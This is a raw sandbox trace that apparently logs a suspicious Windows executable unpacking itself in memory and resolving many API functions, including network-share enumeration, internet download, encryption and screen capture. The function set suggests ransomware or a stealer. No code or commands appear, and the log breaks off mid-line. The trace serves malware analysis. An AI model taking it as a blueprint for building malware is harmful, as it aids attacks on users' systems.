[0148.543] GetProcAddress (hModule=0x74eb0000, lpProcName="TerminateProcess") returned 0x74edd802 [0148.543] GetProcAddress (hModule=0x74eb0000, lpProcName="ExitProcess") returned 0x74ec7a10 [0148.543] GetProcAddress (hModule=0x74eb0000, lpProcName="SetErrorMode") returned 0x74ec1b00 [0148.543] SetErrorMode (uMode=0x400) returned 0x0 [0148.543] SetErrorMode (uMode=0x0) returned 0x400 [0148.543] GetVersionExA (in: lpVersionInformation=0x18e770*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}òv") | out: lpVersionInformation=0x18e770*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0148.544] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x880000 [0148.846] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f7f8 | out: lpflOldProtect=0x18f7f8*=0x2) returned 1 [0149.548] VirtualFree (lpAddress=0x880000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.554] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76810000 [0149.554] GetProcAddress (hModule=0x76810000, lpProcName="RpcStringFreeW") returned 0x76831635 [0149.554] GetProcAddress (hModule=0x76810000, lpProcName="UuidCreate") returned 0x7682f48b [0149.554] GetProcAddress (hModule=0x76810000, lpProcName="UuidToStringW") returned 0x76851ee5 [0149.554] GetProcAddress (hModule=0x76810000, lpProcName="RpcStringFreeA") returned 0x76853fc5 [0149.554] GetProcAddress (hModule=0x76810000, lpProcName="UuidToStringA") returned 0x7688d918 [0149.554] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x73280000 [0150.162] GetProcAddress (hModule=0x73280000, lpProcName="WNetOpenEnumW") returned 0x73282f06 [0150.162] GetProcAddress (hModule=0x73280000, lpProcName="WNetEnumResourceW") returned 0x73283058 [0150.163] GetProcAddress (hModule=0x73280000, lpProcName="WNetCloseEnum") returned 0x73282dd6 [0150.163] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x74ab0000 [0150.243] GetProcAddress (hModule=0x74ab0000, lpProcName="InternetCloseHandle") returned 0x74acab49 [0150.244] GetProcAddress (hModule=0x74ab0000, lpProcName="InternetReadFile") returned 0x74acb406 [0150.244] GetProcAddress (hModule=0x74ab0000, lpProcName="InternetOpenUrlW") returned 0x74b2be5c [0150.244] GetProcAddress (hModule=0x74ab0000, lpProcName="InternetOpenW") returned 0x74ad9197 [0150.244] GetProcAddress (hModule=0x74ab0000, lpProcName="HttpQueryInfoW") returned 0x74ad5c75 [0150.244] GetProcAddress (hModule=0x74ab0000, lpProcName="InternetOpenA") returned 0x74adf18e [0150.244] GetProcAddress (hModule=0x74ab0000, lpProcName="InternetOpenUrlA") returned 0x74af30f1 [0150.244] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x73240000 [0150.356] GetProcAddress (hModule=0x73240000, lpProcName="timeGetTime") returned 0x732426e0 [0150.356] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x74fc0000 [0150.356] GetProcAddress (hModule=0x74fc0000, lpProcName="PathAppendA") returned 0x74fcd65e [0150.356] GetProcAddress (hModule=0x74fc0000, lpProcName="PathFindFileNameW") returned 0x74fdbb71 [0150.356] GetProcAddress (hModule=0x74fc0000, lpProcName="PathRemoveFileSpecW") returned 0x74fd3248 [0150.357] GetProcAddress (hModule=0x74fc0000, lpProcName="PathFileExistsA") returned 0x74ffad1a [0150.357] GetProcAddress (hModule=0x74fc0000, lpProcName="PathFileExistsW") returned 0x74fd45bf [0150.357] GetProcAddress (hModule=0x74fc0000, lpProcName="PathAppendW") returned 0x74fd81ef [0150.357] GetProcAddress (hModule=0x74fc0000, lpProcName="PathFindExtensionW") returned 0x74fda1b9 [0150.357] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x74eb0000 [0150.357] GetProcAddress (hModule=0x74eb0000, lpProcName="VirtualFree") returned 0x74ec186e [0150.357] GetProcAddress (hModule=0x74eb0000, lpProcName="WriteFile") returned 0x74ec1282 [0150.357] GetProcAddress (hModule=0x74eb0000, lpProcName="GetDriveTypeA") returned 0x74edef75 [0150.357] GetProcAddress (hModule=0x74eb0000, lpProcName="OpenProcess") returned 0x74ec1986 [0150.357] GetProcAddress (hModule=0x74eb0000, lpProcName="GlobalAlloc") returned 0x74ec588e [0150.358] GetProcAddress (hModule=0x74eb0000, lpProcName="GetSystemDirectoryW") returned 0x74ec5063 [0150.358] GetProcAddress (hModule=0x74eb0000, lpProcName="WideCharToMultiByte") returned 0x74ec170d [0150.358] GetProcAddress (hModule=0x74eb0000, lpProcName="LoadLibraryW") returned 0x74ec492b [0150.358] GetProcAddress (hModule=0x74eb0000, lpProcName="Sleep") returned 0x74ec10ff [0150.358] GetProcAddress (hModule=0x74eb0000, lpProcName="CopyFileW") returned 0x74ee830d [0150.358] GetProcAddress (hModule=0x74eb0000, lpProcName="FormatMessageW") returned 0x74ec4620 [0150.358] GetProcAddress (hModule=0x74eb0000, lpProcName="lstrcpynW") returned 0x74eed556 [0150.358] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateProcessA") returned 0x74ec1072 [0150.358] GetProcAddress (hModule=0x74eb0000, lpProcName="TerminateProcess") returned 0x74edd802 [0150.358] GetProcAddress (hModule=0x74eb0000, lpProcName="ReadFile") returned 0x74ec3ed3 [0150.358] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateFileW") returned 0x74ec3f5c [0150.358] GetProcAddress (hModule=0x74eb0000, lpProcName="lstrcatA") returned 0x74ee2b7a [0150.359] GetProcAddress (hModule=0x74eb0000, lpProcName="GetEnvironmentVariableA") returned 0x74ec33a0 [0150.359] GetProcAddress (hModule=0x74eb0000, lpProcName="lstrcmpW") returned 0x74ec5929 [0150.359] GetProcAddress (hModule=0x74eb0000, lpProcName="MultiByteToWideChar") returned 0x74ec192e [0150.359] GetProcAddress (hModule=0x74eb0000, lpProcName="lstrlenW") returned 0x74ec1700 [0150.359] GetProcAddress (hModule=0x74eb0000, lpProcName="FlushFileBuffers") returned 0x74ec469b [0150.359] GetProcAddress (hModule=0x74eb0000, lpProcName="GetShortPathNameA") returned 0x74ee594d [0150.359] GetProcAddress (hModule=0x74eb0000, lpProcName="GetFileSizeEx") returned 0x74ec59e2 [0150.359] GetProcAddress (hModule=0x74eb0000, lpProcName="GetLastError") returned 0x74ec11c0 [0150.359] GetProcAddress (hModule=0x74eb0000, lpProcName="SetLastError") returned 0x74ec11a9 [0150.359] GetProcAddress (hModule=0x74eb0000, lpProcName="GetProcAddress") returned 0x74ec1222 [0150.359] GetProcAddress (hModule=0x74eb0000, lpProcName="VirtualAlloc") returned 0x74ec1856 [0150.360] GetProcAddress (hModule=0x74eb0000, lpProcName="MoveFileW") returned 0x74ed9af0 [0150.360] GetProcAddress (hModule=0x74eb0000, lpProcName="FindClose") returned 0x74ec4442 [0150.360] GetProcAddress (hModule=0x74eb0000, lpProcName="Process32FirstW") returned 0x74ee8baf [0150.360] GetProcAddress (hModule=0x74eb0000, lpProcName="LocalAlloc") returned 0x74ec168c [0150.360] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateEventW") returned 0x74ec183e [0150.360] GetProcAddress (hModule=0x74eb0000, lpProcName="GetModuleFileNameA") returned 0x74ec14b1 [0150.360] GetProcAddress (hModule=0x74eb0000, lpProcName="Process32NextW") returned 0x74ee896c [0150.360] GetProcAddress (hModule=0x74eb0000, lpProcName="lstrcatW") returned 0x74ee828e [0150.360] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateMutexA") returned 0x74ec4c6b [0150.360] GetProcAddress (hModule=0x74eb0000, lpProcName="FindNextFileW") returned 0x74ec54ee [0150.360] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateToolhelp32Snapshot") returned 0x74ee735f [0150.361] GetProcAddress (hModule=0x74eb0000, lpProcName="SetEnvironmentVariableA") returned 0x74ece331 [0150.361] GetProcAddress (hModule=0x74eb0000, lpProcName="DeleteFileW") returned 0x74ec89b3 [0150.361] GetProcAddress (hModule=0x74eb0000, lpProcName="LocalFree") returned 0x74ec2d3c [0150.361] GetProcAddress (hModule=0x74eb0000, lpProcName="lstrcpyW") returned 0x74ee3102 [0150.361] GetProcAddress (hModule=0x74eb0000, lpProcName="DeleteFileA") returned 0x74ec5444 [0150.361] GetProcAddress (hModule=0x74eb0000, lpProcName="lstrcpyA") returned 0x74ee2a9d [0150.361] GetProcAddress (hModule=0x74eb0000, lpProcName="SetPriorityClass") returned 0x74edcf28 [0150.361] GetProcAddress (hModule=0x74eb0000, lpProcName="GetCurrentProcess") returned 0x74ec1809 [0150.361] GetProcAddress (hModule=0x74eb0000, lpProcName="GetComputerNameW") returned 0x74ecdd0e [0150.362] GetProcAddress (hModule=0x74eb0000, lpProcName="GetLogicalDrives") returned 0x74ec5371 [0150.362] GetProcAddress (hModule=0x74eb0000, lpProcName="GetModuleFileNameW") returned 0x74ec4950 [0150.362] GetProcAddress (hModule=0x74eb0000, lpProcName="SetStdHandle") returned 0x74f4454f [0150.362] GetProcAddress (hModule=0x74eb0000, lpProcName="GetVersion") returned 0x74ec4467 [0150.362] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateDirectoryA") returned 0x74eed526 [0150.362] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateThread") returned 0x74ec34d5 [0150.362] GetProcAddress (hModule=0x74eb0000, lpProcName="CompareStringW") returned 0x74ec3bca [0150.362] GetProcAddress (hModule=0x74eb0000, lpProcName="GetTimeFormatW") returned 0x74edf481 [0150.362] GetProcAddress (hModule=0x74eb0000, lpProcName="GetDateFormatW") returned 0x74ee34d7 [0150.363] GetProcAddress (hModule=0x74eb0000, lpProcName="EnumSystemLocalesW") returned 0x74f4425f [0150.363] GetProcAddress (hModule=0x74eb0000, lpProcName="GetUserDefaultLCID") returned 0x74ec3da5 [0150.363] GetProcAddress (hModule=0x74eb0000, lpProcName="IsValidLocale") returned 0x74edce46 [0150.363] GetProcAddress (hModule=0x74eb0000, lpProcName="GetLocaleInfoW") returned 0x74ec3c42 [0150.363] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateSemaphoreW") returned 0x74edca5a [0150.363] GetProcAddress (hModule=0x74eb0000, lpProcName="GetModuleHandleW") returned 0x74ec34b0 [0150.363] GetProcAddress (hModule=0x74eb0000, lpProcName="GetTickCount") returned 0x74ec110c [0150.363] GetProcAddress (hModule=0x74eb0000, lpProcName="TlsFree") returned 0x74ec3587 [0150.363] GetProcAddress (hModule=0x74eb0000, lpProcName="TlsSetValue") returned 0x74ec14fb [0150.364] GetProcAddress (hModule=0x74eb0000, lpProcName="TlsGetValue") returned 0x74ec11e0 [0150.364] GetProcAddress (hModule=0x74eb0000, lpProcName="TlsAlloc") returned 0x74ec49ad [0150.364] GetProcAddress (hModule=0x74eb0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x74ec1916 [0150.364] GetProcAddress (hModule=0x74eb0000, lpProcName="SetUnhandledExceptionFilter") returned 0x74ec87c9 [0150.364] GetProcAddress (hModule=0x74eb0000, lpProcName="UnhandledExceptionFilter") returned 0x74ee772f [0150.364] GetProcAddress (hModule=0x74eb0000, lpProcName="GetModuleHandleA") returned 0x74ec1245 [0150.364] GetProcAddress (hModule=0x74eb0000, lpProcName="GetVersionExA") returned 0x74ec3519 [0150.364] GetProcAddress (hModule=0x74eb0000, lpProcName="GlobalMemoryStatus") returned 0x74ec8b6d [0150.364] GetProcAddress (hModule=0x74eb0000, lpProcName="LoadLibraryA") returned 0x74ec49d7 [0150.364] GetProcAddress (hModule=0x74eb0000, lpProcName="FlushConsoleInputBuffer") returned 0x74f67a9f [0150.364] GetProcAddress (hModule=0x74eb0000, lpProcName="WaitForSingleObject") returned 0x74ec1136 [0150.364] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateDirectoryW") returned 0x74ec4259 [0150.364] GetProcAddress (hModule=0x74eb0000, lpProcName="SetFilePointerEx") returned 0x74edc807 [0150.365] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateProcessW") returned 0x74ec103d [0150.365] GetProcAddress (hModule=0x74eb0000, lpProcName="FreeLibrary") returned 0x74ec34c8 [0150.365] GetProcAddress (hModule=0x74eb0000, lpProcName="SetErrorMode") returned 0x74ec1b00 [0150.365] GetProcAddress (hModule=0x74eb0000, lpProcName="lstrlenA") returned 0x74ec5a4b [0150.365] GetProcAddress (hModule=0x74eb0000, lpProcName="SetFilePointer") returned 0x74ec17d1 [0150.365] GetProcAddress (hModule=0x74eb0000, lpProcName="FindFirstFileW") returned 0x74ec4435 [0150.365] GetProcAddress (hModule=0x74eb0000, lpProcName="SetConsoleMode") returned 0x74eda77d [0150.365] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateFileA") returned 0x74ec53c6 [0150.365] GetProcAddress (hModule=0x74eb0000, lpProcName="GetCommandLineW") returned 0x74ec5223 [0150.365] GetProcAddress (hModule=0x74eb0000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x74f6793f [0150.365] GetProcAddress (hModule=0x74eb0000, lpProcName="PeekConsoleInputA") returned 0x74f66f0d [0150.365] GetProcAddress (hModule=0x74eb0000, lpProcName="FreeEnvironmentStringsW") returned 0x74ec51cb [0150.365] GetProcAddress (hModule=0x74eb0000, lpProcName="GetEnvironmentStringsW") returned 0x74ec51e3 [0150.366] GetProcAddress (hModule=0x74eb0000, lpProcName="GetCurrentProcessId") returned 0x74ec11f8 [0150.366] GetProcAddress (hModule=0x74eb0000, lpProcName="QueryPerformanceCounter") returned 0x74ec1725 [0150.366] GetProcAddress (hModule=0x74eb0000, lpProcName="GetTimeZoneInformation") returned 0x74ec465a [0150.366] GetProcAddress (hModule=0x74eb0000, lpProcName="RaiseException") returned 0x74ec58a6 [0150.366] GetProcAddress (hModule=0x74eb0000, lpProcName="GetStringTypeW") returned 0x74ec1946 [0150.366] GetProcAddress (hModule=0x74eb0000, lpProcName="GetConsoleCP") returned 0x74f67bff [0150.366] GetProcAddress (hModule=0x74eb0000, lpProcName="ReadConsoleW") returned 0x74f6739a [0150.366] GetProcAddress (hModule=0x74eb0000, lpProcName="GetConsoleMode") returned 0x74ec1328 [0150.366] GetProcAddress (hModule=0x74eb0000, lpProcName="HeapSize") returned 0x76f23002 [0150.366] GetProcAddress (hModule=0x74eb0000, lpProcName="LoadLibraryExW") returned 0x74ec495d [0150.366] GetProcAddress (hModule=0x74eb0000, lpProcName="OutputDebugStringW") returned 0x74eed1d4 [0150.366] GetProcAddress (hModule=0x74eb0000, lpProcName="SetConsoleCtrlHandler") returned 0x74ec8a09 [0150.366] GetProcAddress (hModule=0x74eb0000, lpProcName="RtlUnwind") returned 0x74eed1c3 [0150.367] GetProcAddress (hModule=0x74eb0000, lpProcName="FatalAppExitA") returned 0x74f44691 [0150.367] GetProcAddress (hModule=0x74eb0000, lpProcName="GetStartupInfoW") returned 0x74ec4d40 [0150.367] GetProcAddress (hModule=0x74eb0000, lpProcName="GetExitCodeProcess") returned 0x74ed174d [0150.367] GetProcAddress (hModule=0x74eb0000, lpProcName="LCMapStringW") returned 0x74ec17b9 [0150.367] GetProcAddress (hModule=0x74eb0000, lpProcName="DeleteCriticalSection") returned 0x76f245f5 [0150.367] GetProcAddress (hModule=0x74eb0000, lpProcName="AreFileApisANSI") returned 0x74f440d1 [0150.367] GetProcAddress (hModule=0x74eb0000, lpProcName="ExitProcess") returned 0x74ec7a10 [0150.367] GetProcAddress (hModule=0x74eb0000, lpProcName="GetProcessHeap") returned 0x74ec14e9 [0150.367] GetProcAddress (hModule=0x74eb0000, lpProcName="HeapReAlloc") returned 0x76f31f6e [0150.367] GetProcAddress (hModule=0x74eb0000, lpProcName="GlobalFree") returned 0x74ec5558 [0150.367] GetProcAddress (hModule=0x74eb0000, lpProcName="SetEndOfFile") returned 0x74edce2e [0150.367] GetProcAddress (hModule=0x74eb0000, lpProcName="ReadConsoleInputA") returned 0x74f66f53 [0150.367] GetProcAddress (hModule=0x74eb0000, lpProcName="CloseHandle") returned 0x74ec1410 [0150.368] GetProcAddress (hModule=0x74eb0000, lpProcName="HeapFree") returned 0x74ec14c9 [0150.368] GetProcAddress (hModule=0x74eb0000, lpProcName="HeapAlloc") returned 0x76f1e026 [0150.368] GetProcAddress (hModule=0x74eb0000, lpProcName="EnterCriticalSection") returned 0x76f122b0 [0150.368] GetProcAddress (hModule=0x74eb0000, lpProcName="LeaveCriticalSection") returned 0x76f12270 [0150.368] GetProcAddress (hModule=0x74eb0000, lpProcName="GetStdHandle") returned 0x74ec51b3 [0150.368] GetProcAddress (hModule=0x74eb0000, lpProcName="GetFileType") returned 0x74ec3531 [0150.368] GetProcAddress (hModule=0x74eb0000, lpProcName="GetModuleHandleExW") returned 0x74ec4a6f [0150.368] GetProcAddress (hModule=0x74eb0000, lpProcName="WriteConsoleW") returned 0x74ee7aca [0150.368] GetProcAddress (hModule=0x74eb0000, lpProcName="EncodePointer") returned 0x76f30fcb [0150.368] GetProcAddress (hModule=0x74eb0000, lpProcName="DecodePointer") returned 0x76f29d35 [0150.368] GetProcAddress (hModule=0x74eb0000, lpProcName="GetSystemTimeAsFileTime") returned 0x74ec3509 [0150.368] GetProcAddress (hModule=0x74eb0000, lpProcName="IsDebuggerPresent") returned 0x74ec4a5d [0150.369] GetProcAddress (hModule=0x74eb0000, lpProcName="IsProcessorFeaturePresent") returned 0x74ec5235 [0150.369] GetProcAddress (hModule=0x74eb0000, lpProcName="IsValidCodePage") returned 0x74ec4493 [0150.369] GetProcAddress (hModule=0x74eb0000, lpProcName="GetACP") returned 0x74ec179c [0150.369] GetProcAddress (hModule=0x74eb0000, lpProcName="GetOEMCP") returned 0x74eed1a1 [0150.369] GetProcAddress (hModule=0x74eb0000, lpProcName="GetCPInfo") returned 0x74ec5189 [0150.369] GetProcAddress (hModule=0x74eb0000, lpProcName="GetCurrentThread") returned 0x74ec17ec [0150.369] GetProcAddress (hModule=0x74eb0000, lpProcName="GetCurrentThreadId") returned 0x74ec1450 [0150.369] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74db0000 [0150.369] GetProcAddress (hModule=0x74db0000, lpProcName="PeekMessageW") returned 0x74dd05ba [0150.369] GetProcAddress (hModule=0x74db0000, lpProcName="PostThreadMessageW") returned 0x74dc8bff [0150.370] GetProcAddress (hModule=0x74db0000, lpProcName="DefWindowProcW") returned 0x76f225dd [0150.370] GetProcAddress (hModule=0x74db0000, lpProcName="DispatchMessageW") returned 0x74dc787b [0150.370] GetProcAddress (hModule=0x74db0000, lpProcName="UpdateWindow") returned 0x74dd3559 [0150.370] GetProcAddress (hModule=0x74db0000, lpProcName="CreateWindowExW") returned 0x74dc8a29 [0150.370] GetProcAddress (hModule=0x74db0000, lpProcName="LoadCursorW") returned 0x74dc88f7 [0150.370] GetProcAddress (hModule=0x74db0000, lpProcName="IsWindow") returned 0x74dc7136 [0150.370] GetProcAddress (hModule=0x74db0000, lpProcName="ShowWindow") returned 0x74dd0dfb [0150.370] GetProcAddress (hModule=0x74db0000, lpProcName="RegisterClassExW") returned 0x74dcb17d [0150.370] GetProcAddress (hModule=0x74db0000, lpProcName="PostQuitMessage") returned 0x74dc9abb [0150.370] GetProcAddress (hModule=0x74db0000, lpProcName="GetMessageW") returned 0x74dc78e2 [0150.370] GetProcAddress (hModule=0x74db0000, lpProcName="DestroyWindow") returned 0x74dc9a55 [0150.370] GetProcAddress (hModule=0x74db0000, lpProcName="SendMessageW") returned 0x74dc9679 [0150.371] GetProcAddress (hModule=0x74db0000, lpProcName="GetProcessWindowStation") returned 0x74dc9eea [0150.371] GetProcAddress (hModule=0x74db0000, lpProcName="GetUserObjectInformationW") returned 0x74dc8068 [0150.371] GetProcAddress (hModule=0x74db0000, lpProcName="MessageBoxA") returned 0x74e1fd1e [0150.371] GetProcAddress (hModule=0x74db0000, lpProcName="GetDesktopWindow") returned 0x74dd0a19 [0150.371] GetProcAddress (hModule=0x74db0000, lpProcName="MessageBoxW") returned 0x74e1fd3f [0150.371] GetProcAddress (hModule=0x74db0000, lpProcName="TranslateMessage") returned 0x74dc7809 [0150.371] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76930000 [0150.371] GetProcAddress (hModule=0x76930000, lpProcName="RegCloseKey") returned 0x7694469d [0150.371] GetProcAddress (hModule=0x76930000, lpProcName="CloseServiceHandle") returned 0x7694369c [0150.371] GetProcAddress (hModule=0x76930000, lpProcName="GetUserNameW") returned 0x7694157a [0150.371] GetProcAddress (hModule=0x76930000, lpProcName="ReportEventA") returned 0x76933ee9 [0150.371] GetProcAddress (hModule=0x76930000, lpProcName="RegisterEventSourceA") returned 0x76942d46 [0150.371] GetProcAddress (hModule=0x76930000, lpProcName="DeregisterEventSource") returned 0x769435dd [0150.372] GetProcAddress (hModule=0x76930000, lpProcName="CryptHashData") returned 0x7693df36 [0150.372] GetProcAddress (hModule=0x76930000, lpProcName="RegSetValueExW") returned 0x769414d6 [0150.372] GetProcAddress (hModule=0x76930000, lpProcName="CryptDestroyHash") returned 0x7693df66 [0150.372] GetProcAddress (hModule=0x76930000, lpProcName="ControlService") returned 0x76957144 [0150.372] GetProcAddress (hModule=0x76930000, lpProcName="RegOpenKeyExW") returned 0x7694468d [0150.372] GetProcAddress (hModule=0x76930000, lpProcName="CryptCreateHash") returned 0x7693df4e [0150.372] GetProcAddress (hModule=0x76930000, lpProcName="CryptEncrypt") returned 0x7695779b [0150.372] GetProcAddress (hModule=0x76930000, lpProcName="CryptImportKey") returned 0x7693c532 [0150.372] GetProcAddress (hModule=0x76930000, lpProcName="QueryServiceStatus") returned 0x76942a86 [0150.372] GetProcAddress (hModule=0x76930000, lpProcName="RegQueryValueExW") returned 0x769446ad [0150.372] GetProcAddress (hModule=0x76930000, lpProcName="CryptReleaseContext") returned 0x7693e124 [0150.372] GetProcAddress (hModule=0x76930000, lpProcName="OpenServiceW") returned 0x7693ca4c [0150.373] GetProcAddress (hModule=0x76930000, lpProcName="OpenSCManagerW") returned 0x7693ca64 [0150.373] GetProcAddress (hModule=0x76930000, lpProcName="CryptAcquireContextW") returned 0x7693df14 [0150.373] GetProcAddress (hModule=0x76930000, lpProcName="CryptGetHashParam") returned 0x7693df7e [0150.373] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75020000 [0150.376] GetProcAddress (hModule=0x75020000, lpProcName="SHGetPathFromIDListW") returned 0x750b17bf [0150.377] GetProcAddress (hModule=0x75020000, lpProcName="SHGetSpecialFolderLocation") returned 0x750ae141 [0150.377] GetProcAddress (hModule=0x75020000, lpProcName="ShellExecuteA") returned 0x75267078 [0150.377] GetProcAddress (hModule=0x75020000, lpProcName="ShellExecuteExW") returned 0x75041e46 [0150.377] GetProcAddress (hModule=0x75020000, lpProcName="CommandLineToArgvW") returned 0x75039ee8 [0150.377] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathA") returned 0x75137804 [0150.377] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75dc0000 [0150.377] GetProcAddress (hModule=0x75dc0000, lpProcName="CoInitialize") returned 0x75ddb636 [0150.377] GetProcAddress (hModule=0x75dc0000, lpProcName="CoInitializeSecurity") returned 0x75de7259 [0150.377] GetProcAddress (hModule=0x75dc0000, lpProcName="CoUninitialize") returned 0x75e086d3 [0150.377] GetProcAddress (hModule=0x75dc0000, lpProcName="CoCreateInstance") returned 0x75e09d0b [0150.377] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76580000 [0150.378] GetProcAddress (hModule=0x76580000, lpProcName=0x6) returned 0x76583e59 [0150.378] GetProcAddress (hModule=0x76580000, lpProcName=0x8) returned 0x76583ed5 [0150.378] GetProcAddress (hModule=0x76580000, lpProcName=0x9) returned 0x76583eae [0150.378] GetProcAddress (hModule=0x76580000, lpProcName=0xc8) returned 0x76583f21 [0150.378] GetProcAddress (hModule=0x76580000, lpProcName=0xca) returned 0x7658fd6b [0150.378] GetProcAddress (hModule=0x76580000, lpProcName=0xc9) returned 0x76584af8 [0150.378] GetProcAddress (hModule=0x76580000, lpProcName=0xc) returned 0x76585dee [0150.378] GetProcAddress (hModule=0x76580000, lpProcName=0x2) returned 0x76584642 [0150.378] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x73220000 [0151.047] GetProcAddress (hModule=0x73220000, lpProcName="GetAdaptersInfo") returned 0x73229263 [0151.047] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x76540000 [0151.081] GetProcAddress (hModule=0x76540000, lpProcName=0xc) returned 0x7654b131 [0151.081] GetProcAddress (hModule=0x76540000, lpProcName=0xb) returned 0x7654311b [0151.081] GetProcAddress (hModule=0x76540000, lpProcName=0x34) returned 0x76557673 [0151.081] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x730c0000 [0152.096] GetProcAddress (hModule=0x730c0000, lpProcName="DnsFree") returned 0x730c436b [0152.096] GetProcAddress (hModule=0x730c0000, lpProcName="DnsQuery_W") returned 0x730d572c [0152.096] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x769d0000 [0152.096] GetProcAddress (hModule=0x769d0000, lpProcName="CryptStringToBinaryA") returned 0x76a05d77 [0152.096] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x766f0000 [0152.096] GetProcAddress (hModule=0x766f0000, lpProcName="DeleteObject") returned 0x76705689 [0152.096] GetProcAddress (hModule=0x766f0000, lpProcName="GetObjectA") returned 0x767085d4 [0152.096] GetProcAddress (hModule=0x766f0000, lpProcName="SelectObject") returned 0x76704f70 [0152.096] GetProcAddress (hModule=0x766f0000, lpProcName="GetDeviceCaps") returned 0x76704de0 [0152.097] GetProcAddress (hModule=0x766f0000, lpProcName="GetBitmapBits") returned 0x7670c155 [0152.097] GetProcAddress (hModule=0x766f0000, lpProcName="BitBlt") returned 0x76705ea6 [0152.097] GetProcAddress (hModule=0x766f0000, lpProcName="DeleteDC") returned 0x767058b3 [0152.097] GetProcAddress (hModule=0x766f0000, lpProcName="CreateDCA") returned 0x76707bcc [0152.097] GetProcAddress (hModule=0x766f0000, lpProcName="CreateCompatibleDC") returned 0x767054f4 [0152.097] GetProcAddress (hModule=0x766f0000, lpProcName="CreateCompatibleBitmap") returned 0x76705f49 [0152.097] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x74970000 [0152.906] GetProcAddress (hModule=0x74970000, lpProcName="atexit") returned 0x7498c544 [0152.906] atexit (param_1=0x710920) returned 0 [0152.918] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f808 | out: lpSystemTimeAsFileTime=0x18f808*(dwLowDateTime=0x6d7beb60, dwHighDateTime=0x1d60a66)) [0152.918] GetCurrentThreadId () returned 0x4d4 [0152.918] GetCurrentProcessId () returned 0x4d0 [0152.918] QueryPerformanceCounter (in: lpPerformanceCount=0x18f800 | out: lpPerformanceCount=0x18f800*=7380601851) returned 1 [0152.978] GetStartupInfoW (in: lpStartupInfo=0x18f798 | out: lpStartupInfo=0x18f798*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x74ec3519, hStdOutput=0x76f0fd35, hStdError=0x76f77daf)) [0152.989] GetProcessHeap () returned 0x2c0000 [0153.140] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74eb0000 [0153.140] GetProcAddress (hModule=0x74eb0000, lpProcName="FlsAlloc") returned 0x74ec4f2b [0153.140] GetProcAddress (hModule=0x74eb0000, lpProcName="FlsFree") returned 0x74ec359f [0153.140] GetProcAddress (hModule=0x74eb0000, lpProcName="FlsGetValue") returned 0x74ec1252 [0153.140] GetProcAddress (hModule=0x74eb0000, lpProcName="FlsSetValue") returned 0x74ec4208 [0153.140] GetProcAddress (hModule=0x74eb0000, lpProcName="InitializeCriticalSectionEx") returned 0x74ec4d28 [0153.140] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateEventExW") returned 0x74f4410b [0153.141] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateSemaphoreExW") returned 0x74f44195 [0153.141] GetProcAddress (hModule=0x74eb0000, lpProcName="SetThreadStackGuarantee") returned 0x74ecd31f [0153.141] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateThreadpoolTimer") returned 0x74edee7e [0153.141] GetProcAddress (hModule=0x74eb0000, lpProcName="SetThreadpoolTimer") returned 0x76f3441c [0153.141] GetProcAddress (hModule=0x74eb0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x76f5c50e [0153.141] GetProcAddress (hModule=0x74eb0000, lpProcName="CloseThreadpoolTimer") returned 0x76f5c381 [0153.141] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateThreadpoolWait") returned 0x74edf088 [0153.141] GetProcAddress (hModule=0x74eb0000, lpProcName="SetThreadpoolWait") returned 0x76f405d7 [0153.141] GetProcAddress (hModule=0x74eb0000, lpProcName="CloseThreadpoolWait") returned 